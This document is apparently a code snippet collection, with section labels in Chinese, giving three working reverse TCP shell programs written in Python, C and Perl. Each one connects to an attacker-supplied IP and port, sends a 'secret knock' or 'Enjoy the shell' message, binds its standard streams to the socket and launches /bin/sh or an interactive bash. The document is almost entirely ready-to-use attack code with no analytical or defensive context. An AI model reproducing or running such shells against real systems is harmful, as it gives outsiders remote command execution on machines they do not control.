Python版:

#!/usr/bin/env python
#-*- coding:utf-8 -*-

'''
 author: xjump
 file: reverse_tcp_shell.py
 usage: python reverse_tcp_shell.py remote_ip remote_port
'''

import os,sys,socket

def main():
    if len(sys.argv) < 2:
        print 'Usage: python reverse_tcp_shell.py remote_ip port'
        sys.exit()
    socket.setdefaulttimeout(5)
    ip =  sys.argv[1]
    port = int(sys.argv[2])
    ADDR = (ip,port)
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((ADDR))
        print '[+] Connect OK (%s:%s)' %(ADDR)
    except:
        print '[+] Connect Error (%s:%s)' %(ADDR)
        sys.exit()
    s.send('[+] secret knock!\n')
    os.dup2(s.fileno(), sys.stderr.fileno())
    os.dup2(s.fileno(), sys.stdin.fileno())
    os.dup2(s.fileno(), sys.stdout.fileno())
    os.system("/bin/sh")
    s.close()

if __name__ == '__main__':
    main()

C版:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>

void usage();
char shell[]="/bin/sh";
char cmd[]="[+] secret knock!\n";
int sclient;
int main(int argc, char *argv[]) {
    if(argc <3){
        usage(argv[0]);
    }

    struct sockaddr_in srv;
    if((sclient = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-] Couldn't make socket!\n"); exit(-1);
    }

    srv.sin_family = AF_INET;
    srv.sin_port = htons(atoi(argv[2]));
    srv.sin_addr.s_addr = inet_addr(argv[1]);

    if(connect(sclient, (struct sockaddr *)&srv, sizeof(struct sockaddr)) == -1) {
        printf("[-] Could not connect to controller!\n"); exit(-1);
    }
    send(sclient, cmd, sizeof(cmd), 0);
    dup2(sclient, 0);
    dup2(sclient, 1);
    dup2(sclient, 2);
    execl(shell,"/bin/sh",(char *)0);
    close(sclient);
    return 0;
}

void usage(char *prog[]) {
    printf("\t\t reverse_tcp_shell v0.1 \n\n");
    printf("Usage: %s remote ip remote_port\n", prog);
    exit(-1);
}

Perl版:

#!/usr/bin/perl -w

use strict; 
use Socket; 
use IO::Handle; 

if($#ARGV+1 != 2){ 
  print "$#ARGV $0 Remote_IP Remote_Port \n"; 
  exit 1; 
} 

my $remote_ip = $ARGV[0]; 
my $remote_port = $ARGV[1]; 

my $proto = getprotobyname("tcp"); 
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip)); 

my $shell = '/bin/bash -i'; 

socket(SOCK, AF_INET, SOCK_STREAM, $proto); 

STDOUT->autoflush(1); 
SOCK->autoflush(1);

connect(SOCK,$pack_addr) or die "can not connect:$!"; 

open STDIN, "<&SOCK"; 
open STDOUT, ">&SOCK"; 
open STDERR, ">&SOCK"; 

print "Enjoy the shell.\n"; 

system($shell); 
close SOCK; 

exit 0;